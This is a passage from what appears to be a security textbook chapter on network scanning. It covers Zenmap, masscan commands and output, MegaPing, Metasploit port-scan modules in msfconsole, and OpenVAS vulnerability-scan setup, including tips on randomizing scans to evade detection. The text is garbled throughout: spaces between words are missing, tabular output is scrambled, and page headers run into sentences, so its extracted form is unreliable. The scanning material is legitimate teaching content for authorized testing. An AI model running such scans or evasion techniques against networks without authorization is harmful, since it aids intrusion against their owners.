ScanningNetworks■services,includingregisteringportswithnmapsothescriptiscalledwhentheidentifiedportisfoundtobeopen,buttherearealsomodulesforoutputthatispresentedbackbynmapwhenthescriptiscomplete.ZenmapYoucanusethecommandlinetodoallyournmapscans,butyoudon’thavetoifyouprefertouseaGUI.Foryears,youhadtousethecommandlinebecausethat’salltherewasavailable.TherewereattemptstocreateGUIstooverlayontopofnmap,andthenoneyear,underGoogle’sSummerofCodeproject,aGUIcalledZenmapwascreated,andithasremainedtheGUIversionofnmapforyears.Itis,assuggested,anoverlayfornmap.ThismeansthatwhatyoudoinZenmaprunsnmapunderneath,andthentheresultsfromnmapareavailableintheGUI.WithZenmap,youdon’thavetothinksomuchaboutthetypeofscanyouareperforminginthesenseofthelistofscantypesImentionedearlier.Instead,asyoucanseeinFigure 5.3,youselectascanbynameinapulldown.FIGURE 5.3 ZenmapscantypesYouwillalsoseethecommandbox.Selectingthedifferentscantypeschangesthecommandline.InsteadoftypeslikeSYNscanorFullConnectscan,youwillselectfromPortScanning 175intensescan,quickscan,regularscan,andothers.Withtheintensescans,thethrottleissethighinordertocompletethescanfaster.Aregularscandoesn’tchangethethrottlespeed.Interestingly,aslowcomprehensivescanalsoturnsupthethrottle.Ifyoudon’twanttouseanyoftheonesthatareprovidedintheinterface,youcanchangethecommandlinetoanythingyouwantandstillrunit.TheadvantagetousingZenmapisn’tbeingabletoselectcannedscansettingsbutinsteadtovisualizetheoutput.Ifyouusethecommandline,yougetalotoftextoutput,andthenyouhavetoextractwhatyouneedfromthat.UsingZenmap,youcanseeallthehoststhatwereidentifiedontheleftside.Youwillalsogetasmalliconindicatingtheoperatingsystemtype,assumingyouperformedascanthatdetectedtheoperatingsystem.Ofcourse,you’llalsogettheregularnmapoutputifyou’dratherlookatthat.Itmaybeeasier,though,toletZenmaporganizetheresultsforyou.Figure 5.4showsanotherwayofvisualizingtheoutput.Again,oneoftheimportantaspectsofdoingaportscanistoidentifytheservicesand,subsequently,theapplications.OntheleftsideinFigure 5.4,clickingtheServicesbuttonshowsthelistofalltheservicesthatwereidentifiedinthescan.Selectingoneoftheserviceswillbringupalistofallthehoststhatwererunningthatserviceduringthescan.IfyoulookontherightsideofFigure 5.4,youwillseethelistofhosts,butyouwillalsosee,insomecases,theapplicationandversionrunningonthathost.FIGURE 5.4 Zenmapserviceoutput176 Chapter5  ScanningNetworks■AnotherusefulcapabilityofZenmapisitsabilitytosavescans.Okay,itgoesbeyondtheabilitytosavescans.Ultimately,youcouldsaveascaninnmap.WhatZenmapwilldoiscomparetwosavedscans.Thismeansyoucangetabaselineofanetworkandthencheckitagainlatertoseewhatmayhavechanged.Ifyouaretestingthesamenetworkmultipletimes,beingabletogetthehistoricdifferenceswillbeuseful.You’llgetnotonlyhoststhataredifferentbutalsoservicesthataredifferent.Bydefault,ZenmapwillsavescansinXMLformat.SinceXMLisatext-­basedformat,youcouldgetthedifferencesbetweentwoXMLfilesyourself,butit’seasiertohaveatoolthatwillconsumeXMLandthencompareitnodebynodetogetmorethanjustthetextdifferences.Zenmapwilldothatforyou.WhileIgenerallyprefertousethecommandline,therearetimeswhenGUItoolsarejustfarmoreuseful.I’dprefertorunscansfromthecommandline,butthevisualizationandorganizationalcapabilitiesofZenmapmakeitworthusing.Ofcourse,Zenmapdoesn’trequirethatyoudotheinitialscansinZenmap.Youcouldrunthescaninnmap,savetheoutputinXMLformat,andthenopentheXMLfileinZenmapandget allthegoodnessthatwe’vebeentalkingabouthere.masscanHaveyoueverwantedtojustportscantheentireInternettoidentifyallthewebserversthatrespond?Ofcourse,ifyouweregoingtodothat,you’dwanttodoitflat-out,asfastasyoupossiblycan.Accordingtomasscan’sdeveloper,RobertGraham,thatwasessentiallythepurposeformasscan.Atitscore,it’saportscanner.Itdoessomeofthesamethingsthatnmapdoes.Thedifferenceisthatitwasdevelopedtogoasfastasyoursystem,andthenetworkconnectionyouhavewillallowittogo.Sincenmaphasbecomethedefactoportscannerandpeoplewhoareinclinedtodoportscansknowhownmapworks,masscanusesthesamesortsofcommand-­lineparametersasnmap.Portscanningisn’treallyfancy,whenyoucomedowntoit.Youtelltheportscannerwhatportsyouwanttoscanandthesystemsyouwanttoscan.Inthefollowingcode,youcanseerunningmasscantoidentifyallthewebservers.Intermsofhowitrelatestonmap,you’llnoticethattheparametertoindicateportsisthesame.You’llalsonoticethatwhereIleftthetypeofscanoff,masscanletmeknowithadfilledinthe-­sSforme.masscanIdentifyingWebServers$masscan-­-­rate=100000-­p80,443192.168.86.0/24Startingmasscan1.0.4(http://bit.ly/14GZzcT)at2021-­01-­0302:26:51GMT-­-­forcedoptions:-­sS-­Pn-­n-­-­randomize-­hosts-­v-­-­send-­ethInitiatingSYNStealthScanScanning256hosts[2ports/host]Discoveredopenport80/tcpon192.168.86.250Discoveredopenport80/tcpon192.168.86.1PortScanning DiscoveredDiscoveredDiscoveredDiscoveredDiscoveredDiscoveredopenopenopenopenopenopenportportportportportport17780/tcpon192.168.86.35443/tcpon192.168.86.44443/tcpon192.168.86.24580/tcpon192.168.86.24780/tcpon192.168.86.3880/tcpon192.168.86.44Themostsignificantdifferenceistheadditionoftherateparameter.Thisisinpacketspersecond,andyoucanusefractionalrates,inadecimalform,suchas0.5,toindicateasinglepacketevery2seconds.Theparameterprovidedhererequests100,000packetspersecond.Yourmileagewillvaryhere,basedonwhatyourtargetis,howmuchbandwidthyouhaveavailable,andhowfastyoursystemandnetworkinterfacecangenerateandsendpacketstothenetwork.Youmayalsohavenoticedthatmasscanforcedtheuseof-­-­randomize-­hosts,whichmeansthattheIPaddressestestedwouldnotbeinnumericalorder.Instead,theorderwillberandomized.Theideabehindrandomizinghostsistopotentiallygetaroundnetworkmonitoringtools.Ifyouscaninorder,itisfairlyclearthatascanishappening.Randomizingscanningmakesitalittlelessobviouswhatishappening.Thismaybeespeciallytrueifyouslowtheratedown.masscandoesn’tjustdoportscanning,though,evenreallyfastscanning.Itcanalsodosomeinformationgathering,muchlikenmapcan.Youcanrequestthatmasscangrabbanners.Thisisdoneusingthe-­-­bannersparameter.GettingBannerswith masscan$masscan-­sS-­-­banners-­-r­ate=100000-­p80,443192.168.86.0/24Startingmasscan1.0.4(http://bit.ly/14GZzcT)at2021-­01-­0303:25:51GMT-­-­forcedoptions:-­sS-­Pn-­n-­-­randomize-­hosts-­v-­-­send-­ethInitiatingSYNStealthScanScanning256hosts[2ports/host]Discoveredopenport80/tcpon192.168.86.162Discoveredopenport80/tcpon192.168.86.1Discoveredopenport80/tcpon192.168.86.160Discoveredopenport80/tcpon192.168.86.250Discoveredopenport80/tcpon192.168.86.44Discoveredopenport80/tcpon192.168.86.35Discoveredopenport443/tcpon192.168.86.245Discoveredopenport80/tcpon192.168.86.196Discoveredopenport80/tcpon192.168.86.247Banneronport80/tcpon192.168.86.35:[http]HTTP/1.1200OK\x0d\x0aConnection:close\x0d\x0aContent-­Type:text/html\x0d\x0aCache-­Control:no-­cache\x0d\x0aExpires:-­1\x0d\x0a\x0dBanneronport80/tcpon192.168.86.35:[title]RedirecttoLogin178 Chapter5  ScanningNetworks■You’llnoticethatonlyoneofthesystemsshowsheaders,andoutofthoseheaders,thereisn’taservertype.Thesameserversuggeststhatthereisaredirecttoaloginpage.Runningthesamescanwithnmapreturnsservertypes.masscandoesn’thavethesamecapabilitiesasnmap,includingalackofsupportforadditionalscantypes,suchastheunexpectedTCPscanslikeXmas,FIN,andACK.Italsodoesn’tsupportUDPscans.However,ifyouwantallthatfunctionality,youcanusenmap.It’sfreeandmorethancapableforthosesortsofscans.Whatmasscangetsyouistheabilitytoindicatewhatrateyouwanttoscanatandtheabilitytoperformveryfastscans.MasscanScanningScanthesamehost(s)asyoudidwithnmap.Identifyanydifferencesinresults.Trytimingthetwoprogramsandseewhichoneisfaster.MegaPingWe’velookedatMegaPingbeforeforitscapabilitytoperformpingsweeps.Asnotedearlier,MegaPinghasanumberofcapabilities,includingtheabilitytorunportscans.Thesearenotjustrun-­of-­the-­millscans,however.You’llrememberthatnmapscansabout1,000portsbydefault.Thesearecommonlyusedports.Youcancertainlyselectotherportsifyouwant.OnethingMegaPingprovidesuswiththatwedon’tgetwithnmapissomepreselectedportcollections.Youcanseethedrop-­downinFigure 5.5thatprovidesyouwithdifferentselectionsforports.OneoftheseisHostilePorts,whichareportsthatarecommonlymisusedaswellasportsthatmaycommonlybeusedbyTrojanhorseprogramsandothermalicioussoftware(malware).Atthebottom,youwillseethelistofportsthatareincludedinthescantype.TorunascaninMegaPing,youselectPortScannerontheleftsideoftheinterface.Thenyouneedtoaddyourtargetsforyourscan.OnedownsidetoMegaPingisthatitdoesn’tacceptaCIDRblockasatarget.Italsodoesn’tacceptarangeofaddresses.IfyouwanttoscanmultipleIPaddresses,youneedtoaddthemin.You’llseetheboxinthemiddlewhereyoucanaddtheaddressesandthenselecttheonesyouwanttoscan.Ifyoujustwanttoscanasingleaddress,youenteritintotheboxbelowDestinationAddressList.ThenyoujustclickStart.Figure 5.6showstheresultsofascanofhostileports.PortScanning 179FIGURE 5.5 MegaPingscantypesOnethingyoumaynoticewhenyoulookattheresultsisthattherearecommonportslistedasbeingopen.You’llseeinthenotealongsideportslike80(www)thattheyareelevatedports.Theseareportsthathavetobeopenedwithadministrativeprivileges.Thismeanstheportswillbetargetedbyattackersbecausecompromisingtheapplicationbehindtheportwillimmediatelygivetheattackeradministrativeprivileges.AnotherscantypeisAuthorizedPorts,whichwillscanjusttherangeofportswhereapplicationsareexpectedtoreside.Otherportsareconsideredtobeephemeral,meaningtheyareassignedtoclientapplicationsassourceportswhentheystartaconversationwithaserver.OnethingtonoteaboutMegaPingisthat,whileithasaloadoffunctionality,itiscommercialsoftware.Thereisafullyfunctionalevaluationversion,butitdoesrequireyoutowaitwhilethelicensemessageshowswhenyoustartuptheapplication.180 Chapter5  ScanningNetworks■FIGURE 5.6 MegaPingscanreportsMetasploitWhileMetasploitisknownprimarilyforbeinganexploitframework,whichyouturntowhenyouwanttostartexploitingservices,meaningyouwanttogetunauthorizedaccesstotheservice,therearethousandsofmodulesavailablethatarenotexclusivelyaboutexploitingservices.WecanuseMetasploitforportscanning.Justtogiveyouasenseofthetypesofportscanningwecando,thefollowingisalistofthemodules,atthetimeofthiswriting,availableinMetasploit.Thiswasobtainedusingmsfconsole,whichisoneofthewaysyoucanaccessMetasploitoverthecommandline.msf6>searchportscanMatchingModules================PortScanning #Check-­-­-­-­-­-­0No1No2No3No4No5No6No7NoNameDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­auxiliary/scanner/http/wordpress_pingback_accessWordpressPingbackLocatorauxiliary/scanner/natpmp/natpmp_portscanNAT-­PMPExternalPortScannerauxiliary/scanner/portscan/ackTCPACKFirewallScannerauxiliary/scanner/portscan/ftpbounceFTPBouncePortScannerauxiliary/scanner/portscan/synTCPSYNPortScannerauxiliary/scanner/portscan/tcpTCPPortScannerauxiliary/scanner/portscan/xmasTCP"XMas"PortScannerauxiliary/scanner/sap/sap_router_portscannerSAPRouterPortScannerDisclosureDate181Rank-­-­-­-­-­-­-­-­-­-­-­­-­-­-­-­-­-­-­normalnormalnormalnormalnormalnormalnormalnormalYoucanseethatwecanusesomeofthesametechniqueswewereusinginnmap.Wherenmapusescommand-­lineswitches,evenifyouareusingZenmap,Metasploitisalittlemoreinteractive.Yousetparametersorvariablestoprovidethemoduleyouareusingwiththeinformationneededtogetthemoduletoscantherightnetworkinthewayyouwanttoscanit.Followingistheoutputfromascansessionusingmsfconsole.First,youneedtousethemodule,whichisexpressedasapath.Onereasonitisexpressedasapathisbecauseit’sstoredasapath.Themodulenamedsynisjustafilenamedsyn.rbinyourfilesystem,becauseit’saRubyscriptthatmakesuseofthelibraryfunctionsprovidedbyMetasploit.Onceyouhaveloadedthemodule,youcanstartsettingparameters.Whenperformingaportscan,youmayonlyneedtosettheremotehosts(RHOSTS)parameter,unlessyouaretargetingspecificports.msf6>usescanner/portscan/synmsf6auxiliary(scanner/portscan/syn)>setRHOSTS192.168.4.0/24RHOSTS=>192.168.4.0/24msf6auxiliary(scanner/portscan/syn)>showoptionsModuleoptions(auxiliary/scanner/portscan/syn):NameCurrentSetting-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­BATCHSIZE256DELAY0thread,inmillisecondsRequired-­-­-­-­-­-­-­-­yesyesDescription-­-­-­-­-­-­-­-­-­-­-­ThenumberofhoststoscanpersetThedelaybetweenconnections,per182 Chapter5  ScanningNetworks■INTERFACEnoThenameoftheinterfaceJITTER0yesThedelayjitterfactor(maximumvaluebywhichto+/-­DELAY)inmilliseconds.PORTS1-­10000yesPortstoscan(e.g.22-­25,80,110-­900)RHOSTS192.168.4.0/24yesThetargethost(s),rangeCIDRidentifier,orhostsfilewithsyntax'file:'SNAPLEN65535yesThenumberofbytestocaptureTHREADS1yesThenumberofconcurrentthreads(maxoneperhost)TIMEOUT500yesThereplyreadtimeoutinmillisecondsmsf6auxiliary(scanner/portscan/syn)>setINTERFACEen0INTERFACE=>en0msf6auxiliary(scanner/portscan/syn)>runOnceyouhaveyourportsselectedandyourhostsselected,whichcanbeanentireblock,asusedhere,oralistofhostsorevenasinglehost,youcanrunthemodule.MetasploitwillexecutetheRubyscriptandpresenttheresults.Followingisaselectionoftheresults.OneadvantagetorunningtheportscaninMetasploitisitwillmaintaintheresultsinadatabasethatyoucanpullbackinsubsequentrunsoftheprogram.Youdon’thavetokeeprunningthescanjustbecauseyouexitedmsfconsoleandstarteditbackupagain.msf6auxiliary(scanner/portscan/syn)>run[+][+][+][+][+][+][+][+][+][+][+]TCPTCPTCPTCPTCPTCPTCPTCPTCPTCPTCPOPENOPENOPENOPENOPENOPENOPENOPENOPENOPENOPEN192.168.4.10:22192.168.4.15:22192.168.4.20:22192.168.4.99:22192.168.4.101:22192.168.4.136:22192.168.4.183:22192.168.4.1:53192.168.4.178:53192.168.4.196:53192.168.4.202:53Ofcourse,youcanalsorunnmapfrominsidemsfconsole,andMetasploitwillstillkeeptrackoftheresultsforyouinthedatabase.You’llgetthesameresultsnomatterwhichapproachyoutakebecausetherulesofnetworkprotocolsareuniversal,andifthereisanapplication,thereisanapplication,regardlessofwhatprogramissendingaconnectionrequesttoit.VulnerabilityScanning 183VulnerabilityScanningKnowingopenportsandevenapplicationsthatarelisteningonthoseportsisagoodstart.Youcanthenstarthuntingandpeckingatthoseportsafterdoingalotofresearchaboutwhatvulnerabilitiesmayexistwithinthoseapplications.Youcouldalsojustfindalotofexploitsandstartthrowingthemattheapplicationsontheopenports.Thismaybeasimplewayofcheckingtoseeiftherearevulnerabilities.Youjustcheckalltheexploitsyoucanfindagainstyourtarget.Thereareafewissueswiththatapproach,however.Thefirstisthatyoumayendupcausingfailuresonyourtargetsystemswhereyoumaynotmeanto.Blindtestingcanleadtounexpectedresults,andoneofyourobjectives,fromanethicalstandpoint,istocausenoharm.Certainlysecuritytestingofanytypecanleadtounexpectedresultsandfailures.However,yourjobistocontrolitasbestyoucanandtoensurethatyourclientoremployerisawareofthepossibleramificationsofyourtesting.Itwouldn’tbeveryprofessionaltotellyourclientthatyou’rejustgoingtothrowalotofexploitsattheirsystemwithoutanyideawhattheimpactwouldbeandthattheymayexperienceoutagesasaresult.Yourjobistocontrolyourtesting—­tobeknowledgeableaboutwhatyouaredoingandwhatthepossibleoutcomesare.Anotherissueisthatifyouareengagedinaredteamtestwherethetargethasnoideayouarerunningattacks,youwanttobesuretheydon’tdetectyou,oratleastyouwanttodoeverythingyoucantoavoiddetection.Blindlyrunningalotofexploitsagainstalotofsystems,includingsystemsthatmaynotevenhavetheapplicationthat’svulnerable,isgoingtobenoisy,andifthereisanydetectioncapability,youwillbecaught.Thatmeansyouwillhavefailed.Abetterapproachistouseavulnerabilityscanner,whichtakesanintelligentapproachtoidentifyingpotentialvulnerabilities.Avulnerabilityscannerwillidentifyopenportsandlisteningapplicationsandthendeterminewhatvulnerabilitiesmaybepossiblebasedonthoseapplications.Thescannerwillthenrunteststhathavebeendefinedforthosevulnerabilities.Theobjectiveofascannerisnottocompromiseasystem;itisjusttoidentifypotentialvulnerabilities.Thisdoesnotguaranteethatwhatthescannerhasidentifiedisanexploitablevulnerability.Itmeansthatthescannerhasfoundsomethingitbelievesisavulnerabilitybasedoninteractionswiththetargetsystemascomparedwithdatathevulnerabilityscannerhas.Thisiscalledafalsepositive.Anyissuefoundbyavulnerabilityscannerneedstobeverifiedmanually.Thismayincludeinvestigatingtheactualinteractionaspresentedbythescanner—­sometimesit’sbasedonreturncodeswithoutlookingattheactualdata,forinstance.Itmayalsoinvolveactuallyredoingthetestperformedbythevulnerabilityscanner.Thevulnerabilityscannerisatoolandshouldn’tbeconsideredtobetheendofyourtesting.It’sthestartingpoint.Inspiteofhowgoodvulnerabilityscannersare,theyarenottheterminus.184 Chapter5  ScanningNetworks■NoteThesearethefourcategoriesofvulnerabilities:■■■■■■■■Falsepositive:Thescannerhasidentifiedsomethingitbelievestobeavulnerability.Afterinvestigation,itturnsoutit’snotreallyavulnerability.Falsenegative:Thescannerhasnotidentifiedavulnerability.Itlaterturnsoutthattherewasavulnerabilitythatthescannermissed.Truepositive:Thescannerhasidentifiedavulnerabilitythat,aftermanualinvestigation,turnsouttobealegitimatevulnerability.Truenegative:Thescannerhasnotidentifiedavulnerabilityandthereisnotavulnerabilitytoidentify.Forahistoricalperspective,it’sworthnotingthatnetworkvulnerabilityscannershavebeenaroundsincetheearly1990s.Thefirstone,developedbyDanFarmerandWietseVenema,wasknownasSecurityAnalysisToolforAuditingNetworks(SATAN).SATANthenspawnedadditionaltoolslikeSecurityAuditorsResearchAssistant(SARA)andSecurityAdministrator’sIntegratedNetworkTool(SAINT).SATANwaswrittenprimarilyinPerlandusedawebinterface.WhilePerlhasbeenreplacedbyotherlanguagesformodernvulnerabilityscanners,theydogenerallyusewebinterfaces.OneofthevulnerabilityscannersthatbecameverypopularisNessus.We’lltakealookatNessusshortly,butwe’llstartwithOpenVAS,whichisrelatedtoNessus.IhadtriedtograbacopyofSATANjusttorunitagainforfun,sinceIlastranit30orsoyearsago.WhiletheSATANwebpageisstillavailable,noneofthemirrorsthatoncehaditareavailable.However,youcanstillgetacopyofSARA,whichhasn’tbeenupdatedinyears,andSAINT,whichisnowacommercialproduct.OpenVASSATANwasopensource,meaningyoucouldlookateverythingSATANwasdoingand,ifyoufeltlikeit,extenditsfunctionalitybyaddingmodulesyourself.IfyoucouldfindacopyofSATANsomewhere,youwouldstillbeabletolookatthesourcecode.Anotheropensourcevulnerabilityscannerintheearly2000swasNessus.Itwasinitiallyreleasedin1998asafreelyavailablevulnerabilityscannerandremainedsountil2005 whenthecompany,formedthreeyearsbefore,closedthesourcecode,makingallfuturedevelopmentproprietarytothecompany.Atthatpoint,theexistingNessussourcewasversion2andthefirstversionfromTenablewasversion3.Theexistingsourcecodeforversion2 wasopen,however,andVulnerabilityScanning 185twoseparateprojectswerecreated,wheretheNessuscodeforversion2,abandonedbytheNessusdevelopers,wasforkedtocreateabasisforthenewprojects.OneoftheseforkswastheOpenVulnerabilityAssessmentSystem(OpenVAS).Initially,aboutOpenVASwasthesameasNessus,asyou’dexpect.Overtime,though,OpenVASdevelopeditsownapplicationarchitecture,usingmultipletiersthatNessushadn’texplicitlyused.Nessusinitiallyhadanativeapplicationclienttomanagethescans,andOpenVAScontinuedtousethesamenativeapplication.OpenVASdevelopedtheGreenboneSecurityAssistant(GSA)astheuserinterfaceforOpenVAS.Today,GSAisaccessedthroughawebinterface.YoucanseetheloginscreenfromGSAinFigure 5.7.FIGURE 5.7 GreenboneSecurityAssistantOpenVASallowsyoutohavemultipleusers,eachofwhichmayhavedifferentpermissions.Someusersmaybeabletocreatescans,whileothersmayonlybeabletolookatthescanresults.OtheruserswouldbeabletocreateusersandadministertheOpenVASinstallation.Inadditiontousers,OpenVASsupportsroles.Permissionswithintherolescanbealteredandnewrolescanbecreated.WhenyouinstallOpenVAS,theadminuseriscreatedaspartofthesetupprocess,andarandompasswordisgenerated.SettingUpTargetsinOpenVASAscaninOpenVAShasmanycomponents.Whenyoucreateascan,youneedatargetorsetoftargets.Creatingatarget alsorequiressomeinformation.YouneedthesetofIPaddressesyouwanttoruntestson.Youcanalsoexcludeaddressesfromthesetyouaretesting.Youmaydothistoprovideanetworkblockinyourtargetlist,butyoumayalsohavefragilesystemsinthatnetworkblock.Becauseofthat,youmaywanttotellOpenVASnottotestthataddress.Figure 5.8showsthedialogboxinOpenVASwhereyoucreateatarget.You’llseetheIPaddressesaswellastheexclusions.186 Chapter5  ScanningNetworks■FIGURE 5.8 CreatingatargetinOpenVASYouwillalsoseethatyoucancreateasetofportsthatyouwanttoscan.OnethingavulnerabilityscannerlikeOpenVASdoesisscanportstodeterminewhichonesitshouldbefocusingtestingon.Youcandeterminetherangeofportsyouwanttotest.Thiscanlimittheamountoftestingyoudoifyouonlycareabouttestingagainstparticularservices.ThisisonewayofcontrollingthescopeofwhatOpenVASisdoing.Youaren’talwaysgoingtobedoingblack-­boxtesting,meaningyouaren’talwaysgoingtohavenoinformation.Sometimesyouwillhavedetailsaboutyourtarget.Thosedetailscanbeusefulbecausetheycanhelpyougetadeepersenseofthevulnerabilitiesyourtargetorganizationissubjectto.Forexample,youmaybeprovidedwithcredentials,andthosecredentialscanbeusedinOpenVAS.Thecredentials,whenprovidedtoOpenVAS,willallowthescannertolookatlocalvulnerabilitiesandnotjustnetworkorremotevulnerabilities.ThecredentialswillbeusedbyOpenVAStologintothesystem.OnceOpenVAShasauthenticated,itcanstartlookingforlocalvulnerabilities.Whileyoucancreatecredentialsfromthetargetwindow,youcanalsojustcreatecredentialsfromtheConfigurationmenu.Whenyouindicatethatyouwanttocreatecredentials,whetheryou’reinthecapTargetCreatewindoworyouarejustgoingtoCredentialsfromtheConfigurationmenu,youaregoingtogetthewindowshowninFigure 5.9.Youcancreatecredentialsthatcanbeusedacrossmultipleprotocols,usingdifferentauthenticationschemes.Thismaybejustusernameandpassword,oritmaybeusingSSHkeysinplaceofthepassword.Oncethecredentialsarecreated,theycanbeappliedtoyourtarget.VulnerabilityScanning 187FIGURE 5.9 CreatingcredentialsinOpenVASOneoftheissueswiththisisthatitassumesthesamecredentialsareusedacrossmultiplesystems,sinceyoucanonlyapplyonesetofcredentialsperprotocol.Thismayworkifyouhaveacentralizeduseraccountstore.Ifnot,youcouldalsogroupyourtargetstomatchcredentials.ScanConfigsinOpenVASThecoreofascanisinthescanconfig.Thescanconfigisthedefinitionofwhatpluginsaretestedagainstthetarget.Bydefault,thereareeightscanconfigsdefinedinOpenVAS.YoucanseethelistofthosescanconfigsinFigure 5.10.Youcanseethenumberofnetworkvulnerabilitytests(NVTs)thathavebeenenabledineachconfig.TheNVTsarecategorizedintofamiliesfororganizationalpurposes.YoucanenabletheentirefamilyorjustenableindividualNVTsasyouneedto.YouwillnoticethatthereisaconfignamedEmptythathasnoNVTsenabledinit.ThereisasecondconfigthathasnoNVTsenabled.TheconfignamedMyScan,whichalsohasnoNVTs,isoneIcreated.Tocreateascanconfig,youclickthesmallblueiconwithastarinitatthetopleftofthescreen.Youwillbeaskedtoprovideanameforitandthenindicatewhichbasetemplateyouwanttostartwith.Oneoptionisanemptyconfig,whichiswhatIusedforMyScan,andtheotherisfullandfast.ThisincludesalltheNVTs.So,youcanbuildfromnothingoryoucanparebackfromeverything.You’llknowhowyouwanttothinkaboutthisbasedonwhatyouaredoing—­startfromscratchandbuilduporparedownfromalargechunk.Onceyou’vecreatedthescan,youhaveaconfigyoucanuse.Creatingisassimpleasnamingitanddeterminingwhatthebaseconfigis.You’lllikelywanttotuneit,though,soyouarerunningteststhataresignificanttoyourtargetnetwork.Thisisnottosaythattestswillberunblindly.OpenVASwillmakedeterminationsaboutwhatteststorunbasedonwhatitfindsfromsomeinitialscans.Whenyouarereadytoselectdifferentteststorun,youwillneedtoedityourscanconfig.You’llmakedecisionsaboutteststorunbyfirstdeterminingthefamiliesyouwanttoenable.YoucanseeapartiallistofthefamiliesinFigure 5.11.188 Chapter5  ScanningNetworks■FIGURE 5.10 OpenVASscanconfigsTherearesomeelementsheretoconsider.Notonlycanyoudeterminewhethertoenablefamilies,andwhichNVTstoenable,butyoucanalsodeterminehowafamilykeepsupasNVTsareaddedovertime.YoucanselecttokeeptheconfigstaticoryoucanhaveOpenVASenablenewonesastheyareaddedtotheOpenVASinstallation.Onceyouopenupthefamily,youwillgetalistofalltheNVTsthatbelongtothatfamily.Figure 5.12showsthelistofNVTsthatbelongtotheFirewallsfamily.You’llnoticethatontherightsidethereisasmallbluewrenchicon.ClickingthiswillbringupadialogshowingyouwheretheremaybepreferencesthatrelatetothatNVT.InthefirewallNVTs,forinstance,therearetimeoutvaluesthatyoucanchangeifyoudon’twanttousethedefaultvalue.ThislistofNVTsallowsyoutoselectexactlywhichonesyouwanttoincludeintheconfig.Youdon’thavetohavelarge,blanketconfigs.Youcanspecificallytailoryourscanconfigsbasedontheenvironmentyouaretesting.Atthispoint,youhaveascanconfigyoucanrunagainstatarget.Thismeansyouneedtomoveontocreatingataskthatwillrunyourscanconfigforyou.You’llbeabletodothisasaone-­offorinascheduledtask.VulnerabilityScanning FIGURE 5.11 OpenVASNVTfamiliesRunninga ScanOneimportantideatokeepinmindisthatonceyourunascan,thefocusshouldbeidentifyingaremediationplanforanyvulnerabilitiesfound.Runningascanandthenignoringtheresultsisprobablyworsethannotrunningthescanatall.Fromaliabilityperspective,itmeansthatvulnerabilitieswereidentified,meaningtheywereknown,withoutanythingbeingdoneaboutthem.Atleastsomeanalysisshouldbeperformedtodocumentaresponsetoeachvulnerability,basedonariskassessmentandcompanypolicy.189190 Chapter5  ScanningNetworks■FIGURE 5.12 OpenVASNVTselectionsScanTasksScanconfigsandtargetsarenecessarytocreateascantask.You’llbeabletocreatethetargetaspartofcreatingascantask,anditwillpersistjustasifyouhadgonetothetargetconfigurationseparately.Thescanconfig,though,hastobedoneaheadoftimeunlessyouwanttouseoneoftheprepackagedscanconfigs.WhenyougototheScansmenuandthenselectTasks,youwillgetsomethingthatlookslikewhatyouseeinFigure 5.13.Thisshowsthattherehasbeenonescanalreadythathasbeenrun.Themorescansyourun,themorethechartswillchange.VulnerabilityScanning 191FIGURE 5.13 OpenVAStasksWhenyoustartascan,youwillseealight-­blueiconintheupperleftwithastarinit.YouwouldhoveroverthisandthenclickNewTask.ThiswillbringupthedialogboxshowninFigure 5.14.Fromhere,youwillneedtoselectyourtargetfromapull-­downlist.Ifyouhaven’tcreatedatarget,youcanclickthebluestaricontocreateatargetandsaveit.Youcanalsocreatealertsbasedonseverityorafilteryoucreate.You’llbeabletosendalertsviaemail,anHTTPGETrequest,SMB,SNMP,orotherconnections.Youwillalsoneedtoselectyourscanconfig.Thiscanbeoneoftheconfigsyouhavecreatedoroneofthedefaultconfigs.Youcancreateascheduleforthescan,butbydefaultthereisnoschedule.Thetaskwillbecreated,waitingforyoutostartit.Usingaschedule,youcanhavethescanrunasoftenasyouwouldlike.Youmaynotwantittorunregularlyoryoumaynotwanttorunitrightaway.YouwillbeabletotellOpenVAStojustrunitonce,asyoucanseeinFigure 5.14.Thetargetandscanconfigwillbepopulated,assumingthereisatargetconfigured.Thescanconfigwillbepopulatedwiththefirstscanconfiginthelist.Thesearetwoconfigurationelementsyouwillwanttomakesureyoucheckonsincetheyarethemostimportantandrelevantfactorsforyourscan.192 Chapter5  ScanningNetworks■FIGURE 5.14 OpenVAStaskcreationThisdoesnotmean,though,thattherearenootherelementsthatareworthlookingat.Ifyouhavealargenetworkandmultiplescannersystems,youmaywanttoselectwhichscanneryouwantthistorunfrom.Youwillalsobeabletodefinethesourceinterfaceincaseyouhavemultipleinterfacesonyourscanner.Youwillalsowanttodeterminetheorderinwhichyouwanttoscanyourtargets.Thismaydependonwhetheryouaretryingtohideyouractivitiesandwhetheryouthinkarandomselectionofhostswillpotentiallymakeitlooklessobviousthatyouarerunningascan.YoucanalsohelpwiththatbyreducingthenumberofsimultaneouslyscannedhostsaswellasthemaximumnumberofconcurrentNVTstestedagainstasinglehost.Tostartupthescan,youwillneedtolookatyourlistoftasksandclickthegreenarrowthatlookslikeastartbuttononanaudioorvideoplayer.Thescanwillnotrununtilyouhavestartedit.Justcreatingthescanmeansyouhavesettheparametersforit.Itdoesn’tmeanyouhavestartedthescan.Thisiswheretheschedulecanbeuseful,becauseOpenVASwillstartthescanforyouwhenyousayratherthanexpectingyoutostartit.VulnerabilityScanning 193ScanResultsYouwillbeabletomonitoryourscanresultsasthescanisrunning.However,youwillalsobeabletoreviewallthecompletedscansandreviewhistoricvulnerabilities.Thescansdashboardwillprovideyouwithchartsforvisualizationofyourvulnerabilitiesovertimesoyoucangetasenseofwhetherthesecuritypostureofyourtargetisimproving.YoucangetalookatthedashboardinFigure 5.15.Whatyouseeissomechartsthatfocusonthereports.Whatyoudon’tseefromthesechartsiswhatthevulnerabilitiesfromallyourscanslooklike.Atthebottomofthisfigureyoucanseeasynopsisofthetwoscansthathavebeenruninthisinstallation.TheimmediatescanwasdoneusingtheTaskWizard,whichisaquickstartwayofkickingoffascan.FIGURE 5.15 OpenVASscansdashboardTheScansmenuprovidesaccesstodifferentwaysoflookingattheresults.ThefirstwaywewilllookatisviatheResultspage.Thishasalistofalltheresultsfromallthescans.Youwillalsogetmorecharts.YoucanseethelistofresultsandtheaccompanyingchartsinFigure 5.16.Thechartsareinteresting,butthelistofresultshassomeinformationthatisofnote.Inthefirstcolumn,youwillseeashortnameforthevulnerability.Thisshouldprovideyouwithenoughinformationsoyouwillknowessentiallywhatthevulnerabilityis.Ataminimum,youwillknowsomethingabouttheserviceordevicefromthevulnerabilityname.194 Chapter5  ScanningNetworks■FIGURE 5.16 